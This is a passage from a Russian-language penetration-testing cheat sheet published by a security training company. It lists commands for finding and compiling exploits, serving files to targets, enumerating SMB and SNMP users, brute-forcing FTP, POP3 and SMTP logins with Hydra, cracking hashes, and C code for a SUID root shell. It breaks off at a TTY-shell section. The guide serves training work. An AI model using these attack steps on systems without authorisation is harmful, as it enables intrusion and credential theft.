{"id":284413,"date":"2017-04-04T14:40:02","date_gmt":"2017-04-04T10:40:02","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=284413"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=284413","title":{"rendered":"\u041a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u2014 \u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0430 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438"},"content":{"rendered":"<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/251\/60d\/569\/25160d5695974ff393c714703a791adb.png\" alt=\"image\" \/><\/div>\n<p>  <\/p>\n<p>\u041a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 Pentestit \u2014 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e \u0441\u0432\u043e\u0435\u043c\u0443 \u0444\u043e\u0440\u043c\u0430\u0442\u0443 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044e \u043a\u0443\u0440\u0441\u044b \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0418\u0411-\u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u043b\u0443\u0447\u0448\u0438\u0445 \u043f\u0440\u0430\u043a\u0442\u0438\u043a \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u043f\u043e \u0443\u0440\u043e\u0432\u043d\u044e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f \u0441\u0440\u0430\u0432\u043d\u0438\u043c\u044b\u0435 \u0441 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0430\u043c\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0439. \u0412\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u043e\u0431\u0443\u0447\u0435\u043d\u0438\u044f, \u0438\u0445 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0430 \u0432 \u043f\u0435\u043d\u0442\u0435\u0441\u0442-\u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u044f\u0445, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f 80% \u043e\u0442 \u043e\u0431\u0449\u0435\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043a\u0443\u0440\u0441\u0430.<strong> \u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c \u0431\u0430\u0437\u0438\u0441 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u043f\u0440\u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435.<\/strong><\/p>\n<p><a name=\"habracut\"><\/a>  <\/p>\n<h2>\u0421\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u0430 \u0447\u0430\u0441\u0442\u044c 2<\/h2>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043e\u043c\u0430\u043d\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0432\u0430\u043c \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f \u043f\u0440\u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435. \u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0447\u0442\u043e \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u043e\u0433\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u0430 \u043b\u0438\u0448\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0431\u043e\u0447\u0438\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u044b. \u0414\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0435 \u0438\u043b\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u043c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0435\u0435 man \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0438\u043b\u0438 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u044c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442.<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a \u0432 \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043d\u0435 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a\u0435, \u0437\u0430 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u0432 \u0441 sqlmap \u0432 \u043a\u043e\u043d\u0446\u0435 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0441\u043e\u0431\u0438\u044f. <a href=\"https:\/\/habrahabr.ru\/company\/pentestit\/blog\/322834\/\">\u041f\u0435\u0440\u0432\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a\u0430.<\/a><\/p>\n<p>  <\/p>\n<h3>\u041f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432<\/h3>\n<p>  <\/p>\n<p>\u041f\u043e\u0438\u0441\u043a \u043d\u0430 exploit-db \u0447\u0435\u0440\u0435\u0437 searchsploit, \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u043f\u043e\u0438\u0441\u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0434\u043b\u044f windows 2003:<\/p>\n<p>  <\/p>\n<pre><code>searchsploit windows 2003 | grep -i local<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 google \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 exploit-db.com:<\/p>\n<p>  <\/p>\n<pre><code>site:exploit-db.com exploit kernel &lt;= 3<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418\u0449\u0438\u0442\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u043c\u0435\u0442\u0430\u0441\u043f\u043b\u043e\u0438\u0442 \u0441 \u043f\u043e\u043f\u043e\u0449\u044c\u044e grep. \u0421\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 search \u0432 msf \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0445\u0443\u0436\u0435:<\/p>\n<p>  <\/p>\n<pre><code>grep -R &quot;W7&quot; \/usr\/share\/metasploit-framework\/modules\/exploit\/windows\/*<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043f\u0438\u044e \u0431\u0430\u0437\u044b exploit-db:<\/p>\n<p>  <\/p>\n<pre><code>searchsploit \u2013u  searchsploit apache 2.2  searchsploit &quot;Linux Kernel&quot;  searchsploit linux 2.6 | grep -i ubuntu | grep local<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f Windows \u0432 Kali:<\/p>\n<p>  <\/p>\n<pre><code>wget -O mingw-get-setup.exe http:\/\/sourceforge.net\/projects\/mingw\/files\/Installer\/mingw-get-setup.exe\/download wine mingw-get-setup.exe select mingw32-base cd \/root\/.wine\/drive_c\/windows wget http:\/\/gojhonny.com\/misc\/mingw_bin.zip &amp;&amp; unzip mingw_bin.zip cd \/root\/.wine\/drive_c\/MinGW\/bin wine gcc -o ability.exe \/tmp\/exploit.c -lwsock32 wine ability.exe  <\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u044f \u0434\u043b\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0440\u0443\u0442\u044b x32 \u0438 x64:<\/p>\n<p>  <\/p>\n<pre><code>gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit)<\/code><\/pre>\n<p>  <\/p>\n<h3>\u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430<\/h3>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0435\u0437\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443.<br \/>  \u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e http \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043d\u0430 Python:<\/p>\n<p>  <\/p>\n<pre><code>python -m SimpleHTTPServer 80<\/code><\/pre>\n<p>  <\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043d\u0430 Python3:<\/p>\n<p>  <\/p>\n<pre><code>python3 -m http.server<\/code><\/pre>\n<p>  <\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e Ruby webrick http \u0441\u0435\u0440\u0432\u0435\u0440\u0430:<\/p>\n<p>  <\/p>\n<pre><code>ruby -rwebrick -e &quot;WEBrick::HTTPServer.new (:Port =&gt; 80, :DocumentRoot =&gt; Dir.pwd).start&quot;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e PHP http \u0441\u0435\u0440\u0432\u0435\u0440\u0430:<\/p>\n<p>  <\/p>\n<pre><code>php -S 0.0.0.0:80<\/code><\/pre>\n<p>  <\/p>\n<h3>\u041c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432<\/h3>\n<p>  <\/p>\n<p>\u041c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 NFS \u0440\u0435\u0441\u0443\u0440\u0441\u0430 \u0432 \/mnt\/nfs:<\/p>\n<p>  <\/p>\n<pre><code>mount 192.168.1.1:\/vol\/share \/mnt\/nfs<\/code><\/pre>\n<p>  <\/p>\n<p>\u041c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 Windows CIFS \/ SMB \u0440\u0435\u0441\u0443\u0440\u0441\u0430 \u043d\u0430 Linux \u0432\/mnt\/cifs \u0415\u0441\u043b\u0438 \u0432\u044b \u0443\u0434\u0430\u043b\u0438\u0442\u0435 password \u0442\u043e \u043e \u043d\u0435\u043c \u0441\u043f\u0440\u043e\u0441\u044f\u0442 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 (\u0431\u043e\u043b\u0435\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442, \u0442.\u043a. \u043d\u0435 \u0437\u0430\u043f\u0438\u0448\u0435\u0442\u0441\u044f \u0432 bash.history):<\/p>\n<p>  <\/p>\n<pre><code>mount -t cifs -o username=user,password=pass,domain=bla \/\/192.168.1.X\/share-name \/mnt\/cifs<\/code><\/pre>\n<p>  <\/p>\n<p>\u041c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 Windows \u0440\u0435\u0441\u0443\u0440\u0441\u0430 \u043d\u0430 Windows \u0438\u0437 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438:<\/p>\n<p>  <\/p>\n<pre><code>net use Z: \\\\win-server\\share password  \/user:domain\\johndoe \/savecred \/p:no<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 smb4k \u043d\u0430 Kali, \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0439 Linux GUI \u0434\u043b\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 SMB \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432:<\/p>\n<p>  <\/p>\n<pre><code>apt-get install smb4k -y<\/code><\/pre>\n<p>  <\/p>\n<h3>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 HTTP \/ HTTPS \u0412\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432<\/h3>\n<p>  <\/p>\n<p>\u0412\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c nikto \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n<p>  <\/p>\n<pre><code>nikto -h 192.168.1.1<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 GUI, CLI \u0432\u0432\u043e\u0434 \u043e\u0431\u044b\u0447\u043d\u043e \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442:<\/p>\n<p>  <\/p>\n<pre><code>dirbuster<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439:<\/p>\n<p>  <\/p>\n<pre><code>dirb http:\/\/example.org<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0439 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432. \u041f\u043e\u0438\u0441\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c php \u0438 js \u043f\u043e \u0441\u0442\u0430\u0440\u043d\u0430\u0434\u0440\u0442\u043d\u043e\u043c\u0443 \u0441\u043b\u043e\u0432\u0430\u0440\u044e:<\/p>\n<p>  <\/p>\n<pre><code>dirsearch.py --random-agents -u example.org -e php,js<\/code><\/pre>\n<p>  <\/p>\n<h3>\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u043f\u0430\u043a\u0435\u0442\u043e\u0432<\/h3>\n<p>  <\/p>\n<p>tcpdump \u0434\u043b\u044f \u043f\u043e\u0440\u0442\u0430 80 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 eth0, \u0432\u044b\u0432\u043e\u0434 \u0432 output.pcap:<\/p>\n<p>  <\/p>\n<pre><code>tcpdump tcp port 80 -w output.pcap -i eth0<\/code><\/pre>\n<p>  <\/p>\n<h3>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445<\/h3>\n<p>  <\/p>\n<p>\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0435\u0445\u043d\u0438\u043a, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u0443\u0437\u043d\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432.<\/p>\n<p>  <\/p>\n<h4>SMB<\/h4>\n<p>  <\/p>\n<p>\u0421\u0431\u043e\u0440 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 SMB:<\/p>\n<p>  <\/p>\n<pre><code>python \/usr\/share\/doc\/python-impacket-doc\/examples\/samrdump.py 192.168.XXX.XXX<\/code><\/pre>\n<p>  <\/p>\n<p>RID cycle SMB \/ \u0441\u0431\u043e\u0440 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 SMB<\/p>\n<p>  <\/p>\n<pre><code>ridenum.py 192.168.XXX.XXX 500 50000 dict.txt<\/code><\/pre>\n<p>  <\/p>\n<h4>SNMP<\/h4>\n<p>  <\/p>\n<p>\u0421\u0431\u043e\u0440 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 SNMP:<\/p>\n<p>  <\/p>\n<pre><code>snmpwalk public -v1 192.168.X.XXX 1 |grep 11.11.11.11 |cut -d\u201d \u201c -f4 python \/usr\/share\/doc\/python-impacket-doc\/examples\/samrdump.py SNMP 192.168.X.XXX nmap -sT -p 161 192.168.X.XXX\/254 -oG snmp_results.txt<\/code><\/pre>\n<p>  <\/p>\n<h3>\u0411\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432<\/h3>\n<p>  <\/p>\n<p>Hydra FTP \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441<\/p>\n<p>  <\/p>\n<pre><code>hydra -l USERNAME -P \/usr\/share\/wordlistsnmap.lst -f 192.168.X.XXX ftp -V<\/code><\/pre>\n<p>  <\/p>\n<p>Hydra POP3 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441<\/p>\n<p>  <\/p>\n<pre><code>hydra -L users.txt -P \/usr\/share\/wordlistsnmap.lst 192.168.X.XXX pop3 -V<\/code><\/pre>\n<p>  <\/p>\n<p>Hydra SMTP \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441<\/p>\n<p>  <\/p>\n<pre><code>hydra -l user@example.com -P \/usr\/share\/wordlistsnmap.lst 192.168.X.XXX smtp -V<\/code><\/pre>\n<p>  <\/p>\n<h3>\u0411\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 John The Ripper<\/h3>\n<p>  <\/p>\n<p>\u0412\u0437\u043b\u043e\u043c \u0445\u044d\u0448\u0430 \u0441\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code>john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hashes<\/code><\/pre>\n<p>  <\/p>\n<p>MD5 \u0432\u0437\u043b\u043e\u043c \u0441\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code>john --format=MD5 --wordlist  \/usr\/share\/wordlists\/rockyou.txt hash.txt<\/code><\/pre>\n<p>  <\/p>\n<p>DES \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441<\/p>\n<p>  <\/p>\n<pre><code>john --format=DES hash --show<\/code><\/pre>\n<p>  <\/p>\n<h3>SUID<\/h3>\n<p>  <\/p>\n<p>\u0427\u0430\u0441\u0442\u043e \u0431\u044b\u0432\u0430\u0435\u0442 \u0442\u0430\u043a, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0438\u043c\u0435\u0435\u0442 SUID \u0431\u0438\u0442, \u043d\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0430\u043c\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0439 UID \u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0434 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u0432\u044b\u0437\u043e\u0432\u043e\u043c, \u0430 \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0448\u0435\u043b\u043b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0414\u043b\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0448\u0435\u043b\u043b\u0430 \u043c\u043e\u0436\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043a\u043e\u0434\u043e\u043c \u043d\u0438\u0436\u0435.<\/p>\n<p>  <\/p>\n<p>SUID \u0421\u0438 \u0448\u0435\u043b\u043b \u0434\u043b\u044f \/bin\/bash:<\/p>\n<p>  <\/p>\n<pre><code class=\"bash\">int main(void){        setresuid(0, 0, 0);        system(&quot;\/bin\/bash&quot;); } <\/code><\/pre>\n<p>  <\/p>\n<p>SUID \u0421\u0438 \u0448\u0435\u043b\u043b \u0434\u043b\u044f \/bin\/sh:<\/p>\n<p>  <\/p>\n<pre><code class=\"bash\">int main(void){        setresuid(0, 0, 0);        system(&quot;\/bin\/sh&quot;); }<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u044f SUID \u0428\u0435\u043b\u043b \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430:<\/p>\n<p>  <\/p>\n<pre><code>gcc -o suid suid.c<\/code><\/pre>\n<p>  <\/p>\n<p>\u0414\u043b\u044f 32 \u0431\u0438\u0442:<\/p>\n<p>  <\/p>\n<pre><code>gcc -m32 -o suid suid.c <\/code><\/pre>\n<p>  <\/p>\n<h3>TTY \u0448\u0435\u043b\u043b\u044b<\/h3>\n<p>  <\/p>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f TTY \u0448\u0435\u043b\u043b\u043e\u0432 \u0438\u0437 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u0448\u0435\u043b\u043b\u0430 \u0432 Linux, \u043f\u043e\u043b\u0435\u0437\u043d\u043e \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432\u0440\u043e\u0434\u0435 su \u0438\u0437 \u0440\u0435\u0432\u0435\u0440\u0441 \u0448\u0435\u043b\u043b\u0430.<br \/>  